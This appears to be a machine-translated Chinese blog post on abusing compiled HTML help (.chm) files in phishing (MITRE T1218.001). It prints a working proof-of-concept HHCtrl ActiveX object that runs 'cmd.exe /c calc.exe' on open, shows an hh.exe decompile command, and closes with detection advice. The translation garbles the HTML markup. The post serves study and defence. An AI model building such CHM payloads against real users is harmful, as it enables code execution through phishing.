电子邮件网络钓鱼和 T1218.001

2023年9月18日马云惹不起马云

倾斜攻击者可能会滥用已编译的HTML 文件(.chm) 来隐藏恶意代码。 CHM 文件通常作为Microsoft HTML 帮助系统的一部分分发。 CHM 文件是HTML 文档、图像和脚本/Web 相关编程语言（如VBA、JScript、Java 和ActiveX）等各种内容的压缩编译。 CHM 内容使用Internet Explorer 浏览器的底层组件显示，该浏览器由HTML 帮助可执行文件(hh.exe) 加载。 - 摘自ATTCK [系统二进制代理执行: 编译的HTML 文件，子技术T1218.001 - 企业| MITRE ATTCK®](https://attack.mitre.org/techniques/T1218/001/)

背景

今天中午，我看到了一份关于Bitter组织针对亚太地区能源领域发起的网络钓鱼活动的分析报告，其中@Ryan Robinson对该组织在2023年3月24日使用的CHM样本进行了分析。于是我开始更多地了解为什么CHM格式能够在钓鱼中发挥如此巨大的价值。

打开CHM文件的过程

CHM 文件是各种内容的压缩编译，例如HTML 文档、图像和脚本/Web 相关编程语言。当CHM打开时，会调用IE浏览器的基本组件进行解析和显示。双击打开CHM文件实质上会创建一个hh.exe进程。

CHM 的有效负载

CHM文件可以通过hh.exe反编译：

hh.exe -反编译%temp%有效负载.chm

如何建立CHM文件？

您可以使用Microsoft HTML Help Workshop 工具创建CHM 文件。 FILES指的是目录，OPTIONS指的是文件的基本信息：

html

头

对象id='测试'类型='application/x-oleobject'classid='clsid:52a2aaae-085d-4187-97ea-8c30db990436'codebase='hhctrl.ocx#Version=5,02,3790,1194'宽度='1'高度='1'

参数名称='命令'值='快捷方式'

参数名称='按钮'值='Bitmap:shortcut'

PARAM 名称='Item1' 值=',cmd.exe, /c calc.exe'

参数名称='项目2'值='273,1,1'

/对象

脚本

测试.HHClick();

/脚本

/头

身体

h1你好/h1

/身体

/html

这段代码中调用了hhctrl.ocxCOM组件，该组件的方法可以执行命令：

COM组件方法列表：CLSID 52A2AAAE-085D-4187-97EA-8C30DB990436 | HHCtrl 对象|强

Atomicatomic-red-team/atomics/T1218.001/src/T1218.001.html at master 马云惹不起马云 redcanaryco/atomic-red-team (github.com) 给出的测试用例代码调用了Click方法，我测试了HHClick也可以被触发。

我尝试在本地用弹出计算器编译一个CHM文档，上传到VirusTotal进行分析：

ATTCK还提到，一些攻击组织使用调用ActiveX对象的方法来操作文件。该进程可能不会创建进程：

CHM文件执行命令的防御措施

这里可以直接总结一下ATTCK矩阵上的建议：

拦截CHM文件的下载过程监控，监控并分析hh.exe的执行情况和参数。将最近对hh.exe 的调用与已知良好参数的先前历史记录进行比较，以识别异常和潜在的敌对活动（例如混淆和/或恶意命令）。非标准进程执行树还可能表明可疑或恶意行为，例如，如果hh.exe 是与其他对抗技术相关的可疑进程和活动的父进程。

参考

CLSID 52A2AAAE-085D-4187-97EA-8C30DB990436 | HHCtrl 对象| STRONTIC针对中国核能工业的网络钓鱼活动(intezer.com)T1218.001 - 探索Atomic Red Teamatomic-red-team/atomics/T1218.001/src/T1218.001.html at master 马云惹不起马云 redcanaryco/atomic-red-team (github.com)系统二进制代理执行: 编译的HTML 文件、子技术T1218.001 - 企业| MITRE ATTCK®Microsoft HTML 帮助研讨会